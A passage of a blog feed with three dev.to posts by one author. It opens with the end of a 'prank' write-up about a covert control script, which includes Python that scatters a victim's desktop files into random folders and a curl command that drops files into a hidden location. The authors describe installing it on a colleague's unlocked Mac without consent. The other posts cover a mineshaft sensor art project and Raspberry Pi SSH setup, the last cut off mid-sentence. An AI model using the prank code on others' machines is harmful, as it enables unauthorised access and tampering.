The upload command was parsed on the server-side and sent out a curl command. Since we were on the same network as the client, we could ping ourselves easily. We started a local server with XAMPP and within the htdocs folder, we uploaded the files we wanted to upload. Then we would send the command &lt;code&gt;sudo curl http://192.168.10.132:80/file.mp3 -o /secret/location/file.mp3&lt;/code&gt; where 192.168.10.132 would be the server's IP address. &lt;/p&gt;
&lt;h4&gt;
  
  
  folders
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;#Running this script N times will create N depth of folder hiding
def randomizeDesktop(amount):
    p1 = randomName()
    randFold = p1.randomFolderName()

    cmd = subprocess.Popen('whoami', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output_bytes = cmd.stdout.read() + cmd.stderr.read()
    user = str(output_bytes, 'utf-8').rstrip()

    thingsToMoveAround = os.listdir('/Users/'+user+'/Desktop')
    rnd = random.randint(30, 150)
    folders = []

    #create random amount of folders
    for x in range(amount):
        folder = p1.randomFolderName()
        cmd = 'mkdir /Users/'+user+'/Desktop/' + folder
        os.system(cmd)
        folders.append(folder)

    #move all things found on desktop to random folders   
    for item in thingsToMoveAround:
        randomFolder = random.choice(folders)
        print('fold: '+randomFolder)
        print('item: '+item)
        cmd = 'mv /Users/'+user+'/Desktop/' + item + ' /Users/'+user+'/Desktop/' + randomFolder + '/' + item
        print(cmd)
        os.system(cmd)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This one is a bit more complicated than the others but bear with me here. Firstly, we initialize class randomName. This class is containing a single function. That is the randomFolderName() function which contains an array of about 1000 folders that can be found on disk and gives you a random record. Then we run &lt;code&gt;whoami&lt;/code&gt; command so we can find out the current user and append that to the file path to the desktop. &lt;/p&gt;

&lt;p&gt;The &lt;code&gt;thingsToMoveAround&lt;/code&gt; variable will list the desktop items and put them inside an array so we can later move those items in new folders.&lt;/p&gt;

&lt;p&gt;First, for loop will create random folders using the &lt;code&gt;mkdir&lt;/code&gt; command, and it will create as many folders as specified. Then the next for loop will go through &lt;code&gt;thingsToMoveAround&lt;/code&gt; and put those things into one of many created folders. &lt;/p&gt;

&lt;p&gt;This has a depth of 1, meaning that there are no subfolders within initial folders, but running this script N times will create N subfolders. This was uber fun, but also somewhat dangerous because it has the potential for rage quit and deleting possibly important files from the desktop.&lt;/p&gt;

&lt;h4&gt;
  
  
  volume control
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
Volume control is part of very useful osascript. &lt;code&gt;sudo osascript -e "set Volume 10"&lt;/code&gt; is all the magic you need to set someone's volume to maximum.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;So I conclude that this was a very fun and interesting project. We've learned many new things, such as learning the internals of OSx, python control, command &amp;amp; control servers, etc. The hack was placed on our colleague's computer while he was on a lunch break, and we activated SSH on his PC when he left. From there, we copied the script to a hidden location and the game was on.&lt;/p&gt;

&lt;p&gt;We've had some difficulties because macOS has weird default privileges, such as not allowing terminal full disk access. This resulted in us being in the complete dark regarding the filesystem. Well, for most of the time. We could've navigated around using &lt;code&gt;cd&lt;/code&gt; but we never knew where to navigate because &lt;code&gt;ls&lt;/code&gt; was not working. We've later realized there is a Shared user to which we've had permission to navigate and list files, so we've nested our script and media there. &lt;/p&gt;

&lt;p&gt;Life tip: ''Never leave your computer unlocked in a room full of young developers."&lt;/p&gt;

&lt;p&gt;.&lt;br&gt;
.&lt;br&gt;
.&lt;/p&gt;

&lt;p&gt;Thank you for reading this! If you've found this interesting, consider leaving a ❤️ &amp;amp; 🦄, and of course, share and comment your thoughts!&lt;/p&gt;

&lt;p&gt;Lloyds is available for partnerships and open for new projects. If you want to know more about us, click &lt;a href="https://lloyds-digital.com/"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Also, don’t forget to follow us on &lt;a href="https://www.instagram.com/lloyds.digital/"&gt;Instagram&lt;/a&gt; and &lt;a href="https://www.facebook.com/lloydsdigital"&gt;Facebook&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>hack</category>
      <category>python</category>
      <category>ssh</category>
      <category>prank</category>
    </item>
    <item>
      <title>Underground Weather Station (Digital art)</title>
      <dc:creator>Tomas Martincic</dc:creator>
      <pubDate>Wed, 07 Jul 2021 06:35:22 +0000</pubDate>
      <link>https://forem.com/martincic/underground-weather-station-digital-art-365i</link>
      <guid>https://forem.com/martincic/underground-weather-station-digital-art-365i</guid>
      <description>&lt;p&gt;I like my code in either of the following two states: semantic, efficient, and minimalistic &lt;strong&gt;OR&lt;/strong&gt; straight up Mad Max/MacGyver style duct-taping everything together. This integration is the latter. &lt;/p&gt;

&lt;p&gt;This project is a modern art installation combining technology and our town's historical heritage, &lt;a href="https://www.google.com/search?q=Labin+%22%C5%A1oht%22&amp;amp;tbm=isch&amp;amp;ved=2ahUKEwiWv9LflZzxAhV97OAKHezJA4QQ2-cCegQIABAA&amp;amp;oq=Labin+%22%C5%A1oht%22&amp;amp;gs_lcp=CgNpbWcQAzIECAAQHjoECCMQJzoCCAA6BggAEAgQHjoECAAQGFDvAljNHGCVIGgAcAB4AIABpgGIAYwIkgEDMC44mAEAoAEBqgELZ3dzLXdpei1pbWfAAQE&amp;amp;sclient=img&amp;amp;ei=oPDJYJbvPP3Ygwfsk4-gCA&amp;amp;bih=704&amp;amp;biw=1536&amp;amp;rlz=1C1GCEA_enHR913HR914" rel="noopener noreferrer"&gt;an old mineshaft in the center of our town&lt;/a&gt;. The main idea was to create a display that would mirror the mineshaft's "breathing". The display would visually alter upon environmental changes within the mineshaft. The official name was "mine ultrasound". The main technical challenge was to lower the instruments into the mineshaft and retrieve the data in real time. POE (Power over Ethernet) was the first idea, but we've realized there are significant losses over greater distances. And as we required 150-200 meters, this wasn't suitable solution. We decided to lower 240V cables which don't have power loss over longer distances (unlike POE) and transfer the data wirelessly using nRF24L01+ modules. The monitoring was done in more than 30 days. In this blog, I will show you how I imagined the implementation and gladly take/challenge any of your suggestions.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Last second fixes on Master in actual mineshaft on top of mineshaft hole.&lt;/em&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fteqe37wvzweeqkoarqk9.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fteqe37wvzweeqkoarqk9.jpg" alt="Last second fixes on master in actual mineshaft"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;The final product, custom fluid digital art based on our historical heritage.&lt;/em&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fygs45zyfzsimqih4jrry.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fygs45zyfzsimqih4jrry.jpg" alt="Final product"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Table of contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Hardware/Software stack&lt;/li&gt;
&lt;li&gt;Technical Project overview&lt;/li&gt;
&lt;li&gt;Slave&lt;/li&gt;
&lt;li&gt;Master&lt;/li&gt;
&lt;li&gt;Display&lt;/li&gt;
&lt;li&gt;Custom TCP protocol&lt;/li&gt;
&lt;li&gt;Bonus&lt;/li&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
  
  
  Hardware/Software stack
&lt;/h2&gt;

&lt;p&gt;The project in question is composed of the following hardware: &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;2x Raspberry Pi (4B &amp;amp; 3B+)&lt;/li&gt;
&lt;li&gt;2x nRF24L01+ (2.4GHz Transceiver)&lt;/li&gt;
&lt;li&gt;MCP9808 (I2C temperature sensor)&lt;/li&gt;
&lt;li&gt;SHT21 (Temperature/Humidity Sensor)&lt;/li&gt;
&lt;li&gt;BMP280 (I2C pressure sensor)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;And the following programming languages:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Python&lt;/li&gt;
&lt;li&gt;PHP&lt;/li&gt;
&lt;li&gt;Bash&lt;/li&gt;
&lt;li&gt;MariaDB&lt;/li&gt;
&lt;li&gt;JavaScript&lt;/li&gt;
&lt;li&gt;HTML/CSS&lt;/li&gt;
&lt;li&gt;Bunch of helper libraries&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;
  
  
  nRF24L01+
&lt;/h3&gt;

&lt;p&gt;The nRF24L01+ PA/LNA module has documented a range up to 1km+ with a direct line of sight, with environmental tests showing up to at least 250m. With specifications of this project being underground with almost absolute zero RF interference, I believe that if someone wanted to recreate something similar from this post, the module could achieve its full potential.&lt;/p&gt;
&lt;h2&gt;
  
  
  Technical Project Overview
&lt;/h2&gt;

&lt;p&gt;The project used a Master-Slave setup to achieve asymmetric communication between the devices. Both setups ran Raspbian OS because nothing more was required, and it was pretty simple to set up using &lt;a href="https://projects.raspberrypi.org/en/projects/noobs-install" rel="noopener noreferrer"&gt;NOOBS&lt;/a&gt;. I will start from the bottom of the mineshaft, and we'll work our way up all the way to "the cloud". I will not dive into the code itself within this post but you can check it out on  &lt;a href="https://github.com/Martincic/kova-je-nasa/" rel="noopener noreferrer"&gt;github.com/Martincic/kova-je-nasa&lt;/a&gt;. Instead, I will explain roughly how the whole setup worked and how technologies intertwined. &lt;/p&gt;
&lt;h2&gt;
  
  
  Slave - the bottom of the pit
&lt;/h2&gt;

&lt;p&gt;Slave was the Raspberry 3B+ which had been collecting the data from the sensors upon master's request.  The language of choice here was python due to simplicity, speed, and brilliant libraries for all sensors and nRF24L01+'s. &lt;/p&gt;

&lt;p&gt;The setup had to be running the python script from boot onwards, but for python being known to crash after long runtime instances, I've hacked my way around this. Firstly, I have made a simple foreverPy.sh script which owns the slave.py process, and upon it's failure, it simply restarts it again. This is the best way to own a process and control it in case of a shutdown; it contains the following code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;until sudo python3 /home/pi/slave.py; do
    echo 'Python process crashed... restarting...' &amp;gt;&amp;amp;2
    sleep 3
done
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There is a sleep command before restarting the process, which acts as a buffer if there is a critical mistake in the code, and the process would fail upon any run attempt. This would overflow your console, and you wouldn't be able to stop the script.&lt;br&gt;
&lt;code&gt;&amp;gt;&amp;amp;2&lt;/code&gt; redirects the output from echo - stdout (standard output) command to stderr (standard error) command. Text output from the command to the shell is delivered via the stdout (standard out) stream. Error messages from the command are sent through the stderr (standard error) stream.&lt;/p&gt;

&lt;p&gt;Finally, after owning the python process and making sure that it cannot fail, I had to start it whenever the machine starts. I have achieved this by modifying the .bashrc file which can be found at &lt;code&gt;/home/pi/.bashrc&lt;/code&gt;. At the bottom of this "user boot" file, we can add the command that runs &lt;code&gt;foreverPy.sh&lt;/code&gt; with &lt;code&gt;sudo bash /home/pi/foreverPy.sh&lt;/code&gt;. It's advised to add this line to the bottom of the file.&lt;/p&gt;
&lt;h2&gt;
  
  
  Master - brains of the operation
&lt;/h2&gt;

&lt;p&gt;Master is the mediator between the cloud and slave in the pit. The master has the same setup for running  the python script forever. The master is asking for the data from the slave, receiving the data, constructing it from bytes to interpretable numbers, and sending it to the server's API for further use. Along with retrieving data and passing it along the line, the master is also connected to the TV and is displaying the graph with "floating dots/graphs in various colors and speeds". After lots of thoughts on how to display the graphics and passing over a ton of packages/libraries/programs, I've decided to output it in the format of a web page. This would allow anyone with a mobile device, tablet, laptop, etc. to view the live ultrasound of the mineshaft from the comfort of their home. A great contributor to the decision was the ongoing pandemic which limited the visitors. After figuring out how to display it, it was simple to set up on master. I've simply had to start up the browser on boot, and hide the mouse cursor. Going back to .bashrc file where we've started foreverPy.sh we will add two more lines below. &lt;code&gt;chromium-browser --app=http://some-website.com --start-fullscreen&lt;/code&gt; will open the chromium web browser at the desired website in fullscreen mode. And &lt;code&gt;unclutter -idle 1 -root&lt;/code&gt; will hide the mouse cursor after being idle for 1 second. &lt;code&gt;unclutter&lt;/code&gt; is a package that can be installed from any Linux flavor by calling &lt;code&gt;apt-get install unclutter&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;
  
  
  Display
&lt;/h2&gt;

&lt;p&gt;This was the most intimidating part of the project for me since I'm a backend developer and the best thing I've ever designed was probably the plasticine ashtrays in kindergarten. There were a couple of prerequisites for this: &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;It had to be programmatic art&lt;/li&gt;
&lt;li&gt;It had to have input variables&lt;/li&gt;
&lt;li&gt;Should not be repetitive &lt;/li&gt;
&lt;li&gt;Should be able to graph the data over it &lt;/li&gt;
&lt;li&gt;Have it run at a reasonable speed &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Since raspberry pi isn't exactly a supercomputer, the last point was tough to satisfy. These were big tasks to overcome, but I've found a brilliant JavaScript library called &lt;a href="https://vincentgarreau.com/particles.js/" rel="noopener noreferrer"&gt;particles.js&lt;/a&gt; after lengthy research. This library allowed me to create random enough graphs at a low-processing power cost; randomness was modified by the latest inputs from the mineshaft (e.g. warmer the mine, faster the particles). Moreover, it allowed me to draw other things above the particles such as graphs and company stamps, last read date, current data, etc. The only problem with the library was that you couldn't alter the parameters retroactively. The library can take input parameters on load, and that is it. This was solved by a simple JavaScript hack which refreshed the website site every 90 seconds (which was rough refresh rate of data from mineshaft).&lt;/p&gt;

&lt;p&gt;Once the website is refreshed, PHP would input the latest records into particles.js and display the latest records. It felt like cheating, but if it works, it ain't stupid. Ninety seconds was enough for data to refresh and gave the animation enough fluidity so it's not looking bugged out to the user looking at the animation.&lt;/p&gt;
&lt;h2&gt;
  
  
  Custom TCP Protocol
&lt;/h2&gt;

&lt;p&gt;For this part of my implementation, I've used another &lt;a href="https://circuitpython-nrf24l01.readthedocs.io/en/latest/greetings.html" rel="noopener noreferrer"&gt;great library from the CircuitPython&lt;/a&gt;. It has great documentation and comes with lots of examples. This part of the communication between two nRF24L01+ modules was imagined in this manner because I wanted the master to be only in transmit mode and the slave only in receive mode. This was due to random crashes and I wanted them being completely independent of each other no matter at which moment one of them falls asleep (read: crashes), or wakes up.&lt;/p&gt;

&lt;p&gt;Traditional communication would require the master and the slave to switch between TX (transmit) and RX (receive) modes all the time. After any packet is received, there is an ACK (acknowledgement) packet which is sent from the receiver to the transmitter. Imagine a conversation where those &lt;code&gt;mhmms&lt;/code&gt; and &lt;code&gt;uhmms&lt;/code&gt; were mandatory for communication, and if you don't hear &lt;code&gt;mhmm&lt;/code&gt; after each sentence, you would repeat the sentence until you get one, or you get bored repeating it.&lt;/p&gt;

&lt;p&gt;With all this switching of modes, there is a big room for error when the system is unreliable. Sooner or later both would be stuck in RX mode and wait for one another indefinitely.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Custom TCP protocol diagram&lt;/em&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhjezs68l8usjoofkellt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhjezs68l8usjoofkellt.png" alt="Custom TCP Protocol"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So what I did was set master to TX and give it an array of questions which was a simple string array. Then in while true loop I'd go through each of the questions and send it to the slave. Slave at the other end is always in RX waiting for a question and is always ready to respond, it also has an associative array (unlike regular array which can be found on master) within which it has question associated with its value (eg. &lt;code&gt;'temp' =&amp;gt; 22.1, 'humid' =&amp;gt; 79.9, 'press' =&amp;gt; 1011.1&lt;/code&gt;). Once the slave receives a message, it sends an ACK anyways so I simply access my map of answers before sending it, find the answer at the position of question (eg. I receive 'temp' and in ACK I send &lt;code&gt;answer_array&lt;/code&gt; at position &lt;code&gt;received_value&lt;/code&gt; back to the master). This way I've cut the number of packets in half and greatly reduced room for error. After each answered question, I would've refreshed my answers array with new/fresh data and always be ready to answer the next question with the latest value.&lt;/p&gt;

&lt;p&gt;With this setup since the master is always and the only one within TX mode, nobody would complain if nothing gets send around. On the other side, the slave is always and the only one within RX mode and the master would simply ignore timed-out packets by default. &lt;/p&gt;

&lt;p&gt;&lt;em&gt;Testing environment for custom packets&lt;/em&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjjcwds4gu6swfvl59ms5.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjjcwds4gu6swfvl59ms5.jpg" alt="Photo of setup communicating in my bedroom"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Bonus
&lt;/h2&gt;

&lt;p&gt;Along with simple data that was consisting of a couple of bytes altogether, I also had an idea of the coal mine live stream. The idea was the following. Since we're lowering the raspberry down at depth room where miners had telephones and other equipment, and since we're pulling down 240V cable, we could've connected multiple light bulbs to 240V power supply and control them with 5V relay for raspberry. The problem was that the image that raspberry would take with Pi Camera would appear static (always the same), but this could've been solved  with a tiny servo motor, or simply by hanging the RPI in the air. It would move for sure on random because of strong air currents going through mineshaft and out. This part was discarded, but I'll post it here anyway as a bonus.  &lt;/p&gt;

&lt;p&gt;Photos from below 150ish meters below the surface. The quality is pretty bad since it's pitch black and any light that we've had was not sufficient for a mobile camera. &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/392bmphjil6tex2czigt.jpg" rel="noopener noreferrer"&gt;Telephone&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jqjj9949agsr2im3j28p.jpg" rel="noopener noreferrer"&gt;Electric cupboard left&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jqklf75fnhp4cybsozg3.jpg" rel="noopener noreferrer"&gt;Electric cupboard right&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0624q6ky2pdm4gazs1cq.jpg" rel="noopener noreferrer"&gt;Behind this door is an elevator through which we lowered the slave Raspberry&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2wmxofsuzbqa8nsm9v0h.jpg" rel="noopener noreferrer"&gt;Closed off, collapsed tunnel&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l0hqvos7ym3v0wxki28y.jpg" rel="noopener noreferrer"&gt;Coal veins&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  What's wrong with you???
&lt;/h3&gt;

&lt;p&gt;Here is the log of what I've recorded at the time and it is obvious that it took way too long to transmit any useful file size by acknowledging all packets.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;13.53 - start transmission&lt;/li&gt;
&lt;li&gt;14.03 - ongoing 0.9Mb sent&lt;/li&gt;
&lt;li&gt;14.28 - ongoing 2.1Mb sent&lt;/li&gt;
&lt;li&gt;14:35 - ongoing 2.5Mb sent&lt;/li&gt;
&lt;li&gt;14:45 - end transmission 2.6Mb sent&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After lots of testing and talking to CircuitPython developers, we concluded that Python was not the tool for the task. The only possible resolution of this problem was translating all the code to C++, which was not a viable solution. Until it hit me. Should I use streaming protocol rather than ack protocol and send a slow video? I've figured that in the capital of Croatia there is much more RF interference than in a couple of hundred meters deep mineshaft in the small town of Labin. This showed to be false because photos from Pi Camera V2 took about 10ish (I forgot to note measurements for this) minutes per transmission, let alone single per second.&lt;/p&gt;

&lt;p&gt;Before the actual transmission, I've broken the image down to byte array in the following manner:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;   buffers = []
    with open("coal.jpeg", "rb") as image:
      f = image.read()      
      b = bytearray(binascii.hexlify(f))

    counter = 0
    while counter &amp;lt; sys.getsizeof(b):
        counter += 32
        if not counter &amp;gt; sys.getsizeof(b):
            buffers.append(b[counter:counter+32])
    return buffers
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this code snipped, the counter += 32 is the size of a single packet which I've set to 32 bytes which is nRF24L01’s maximum packet size. After deconstructing the image into buffer, I've sent it over to master where I've had to construct it in the following manner:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;f = open("image.jpeg", 'wb')
while time.monotonic() &amp;lt; start_timer + timeout:
        if nrf.available():
            count += 1
            # retreive the received packet's payload
            buffer = nrf.read()  # clears flags &amp;amp; empties RX FIFO
            bytes += buffer
            f.write(binascii.unhexlify(buffer))
            if count%1000 == 0:
                pass
            start_timer = time.monotonic()  # reset timer on every RX payload

    # recommended behavior is to keep in TX mode while idle
    nrf.listen = False  # put the nRF24L01 is in TX mode
    f.close()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This writes to the .jpg file every packet that it receives (and we de-hex [convert from hex to binary] the retrieved data to make it binary again).&lt;/p&gt;

&lt;p&gt;This worked like a charm and here is the final result: &lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F067t31aqlpys7q0tufkp.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F067t31aqlpys7q0tufkp.jpeg" alt="Transmitted image with packet loss"&gt;&lt;/a&gt;&lt;br&gt;
I say it worked like a charm because once I've transmitted it, it was even better than I could have imagined. This is an art installation focused on mineshaft and if any static occurred it would too be random and created by mine itself, which really adds to the technical/artistic combination we were looking for.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;So the project altogether was pretty exciting, and I've learned tons of new things. I was very fulfilled once it was done because at moments I thought it was too big of a task. Again, some issues could've been better, such as forgetting to set up SSH access on the master facepalm. Data was being sent way too fast, and I've ended up filtering data on the server by accessing every N'th record. Also, I've learned later that image transfers were not successful every time because throughout the image files there were flags of some sorts (I've originally thought there were only headers in images) and since UDP loses packets, the file would come out broken at times. Once we've lowered the rig even those lousy 10 meters in the mineshaft, the first (apparently known) anomaly was the temperature which remained constant at 14 Celsius from the moment of insertion throughout the life of the project. The humidity was about 100% from insertion until the end as well and only kept going up (up to 115%) which wasn't very interesting. And then there was the pressure which luckily was the only thing that fluctuated a little due to air currents.&lt;br&gt;
Pretty interesting all in all; not great, not terrible.&lt;/p&gt;

&lt;p&gt;Thank you for reading this! If you've found this interesting, consider leaving a ❤️&lt;br&gt;
🦄, and of course, share and comment your thoughts!&lt;/p&gt;

&lt;p&gt;Lloyds is available for partnerships and open for new projects. If you want to know more about us, click &lt;a href="//lloyds-design.com"&gt;here&lt;/a&gt;.  &lt;/p&gt;

&lt;p&gt;Also, don’t forget to follow us on &lt;a href="https://www.instagram.com/lloyds.design/?hl=en" rel="noopener noreferrer"&gt;Instagram&lt;/a&gt; and &lt;a href="https://www.facebook.com/lloydsgn/" rel="noopener noreferrer"&gt;Facebook&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>raspberrypi</category>
      <category>nrf24l01</category>
      <category>art</category>
      <category>hack</category>
    </item>
    <item>
      <title>Establishing and securing a remote connection to Raspberry Pi</title>
      <dc:creator>Tomas Martincic</dc:creator>
      <pubDate>Mon, 28 Sep 2020 09:25:23 +0000</pubDate>
      <link>https://forem.com/lloyds-digital/establishing-and-securing-a-remote-connection-to-raspberry-pi-45e7</link>
      <guid>https://forem.com/lloyds-digital/establishing-and-securing-a-remote-connection-to-raspberry-pi-45e7</guid>
      <description>&lt;p&gt;Today I’m writing about server security, specifically, on my homemade server running on Raspberry Pi. I’ve recently configured a homemade server (if you're interested you should definitely check out &lt;a href="https://dev.to/lloyds-digital/how-you-can-host-websites-from-home-4pke"&gt;this blog&lt;/a&gt;) with a still unknown purpose. This could be your standard Media server, IoT device controller, web server, or whatever else you can imagine. The possibilities are endless. This type of device is usually configured, plugged into power, and chucked behind your router/tv/any other bunch of wires. For convenience, you’ll probably enable SSH on it so it can be accessed from anywhere in the world without the need to connect a keyboard, mouse, and a screen to it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Focftleb1lis7szmguhfh.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Focftleb1lis7szmguhfh.jpg" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;My homemade web server - Raspberry pi 3B+ using Raspbian GNU/LINUX 10 (buster)&lt;/em&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  Enabling SSH on your Raspberry Pi
&lt;/h1&gt;

&lt;p&gt;Enabling remote access to your pi is as easy as saying pie! This can be done through GUI or CLI, both are extremely simple. CLI is as simple as typing &lt;code&gt;sudo systemctl start ssh&lt;/code&gt;. Then check if it's working with &lt;code&gt;sudo systemctl status ssh&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F91pvl4gxzxh2fmtiza2s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F91pvl4gxzxh2fmtiza2s.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;GUI version of enabling SSH&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;We’re halfway there to making your device public accessible. Once you’ve enabled SSH on your device you have to port forward connections from your router on port 22 (22 is the default SSH port) to your device. Port forwarding is simply telling someone who is connecting to the router, where to ask next (in this case, next is our Server). You can imagine the router's address being a literal address of a building. You know who you want to visit, but don’t know exactly where in the building they are located. Once  you reach the address (the router), it will tell you which floor and which apartment is the person you want to visit. This is what we do with port forwarding. &lt;/p&gt;
&lt;h2&gt;
  
  
  Port Forwarding
&lt;/h2&gt;

&lt;p&gt;The next thing we have to do is configure port forwarding on our router. To access your router, you need to open up any web browser and in the URL  bar, you should write your default gateway. The most common default gateway is 192.168.0.1 for many wireless home routers. If this isn’t working for you, you should &lt;a href="https://www.google.com/search?rlz=1C1GCEA_enHR913HR914&amp;amp;sxsrf=ALeKk038TKlwFVg4SF0WP6He0pY2tpoXyA%3A1600682905936&amp;amp;ei=mXtoX4LaOJGTkwWA6Kf4Bw&amp;amp;q=What+is+my+default+gateway+&amp;amp;oq=What+is+my+default+gateway+&amp;amp;gs_lcp=CgZwc3ktYWIQAzIECCMQJzIECCMQJzICCAAyBwgAEBQQhwIyAggAMgIIADICCAAyAggAMgIIADICCAA6BAgAEEc6BAgAEENQgBBYzzhgpjtoAnAEeACAAZ8BiAHpGJIBBDIuMjWYAQCgAQGqAQdnd3Mtd2l6yAEIwAEB&amp;amp;sclient=psy-ab&amp;amp;ved=0ahUKEwjCiobAgPrrAhWRyaQKHQD0CX8Q4dUDCA0&amp;amp;uact=5" rel="noopener noreferrer"&gt;check with google&lt;/a&gt; which is your default gateway. You will be presented by the login screen here; this is your router’s settings webpage. Don’t worry if this address resulted in “This site can’t be reached” response. You will have to google up your router anyways to find credentials to log in to your router. Once you’re logged in, you 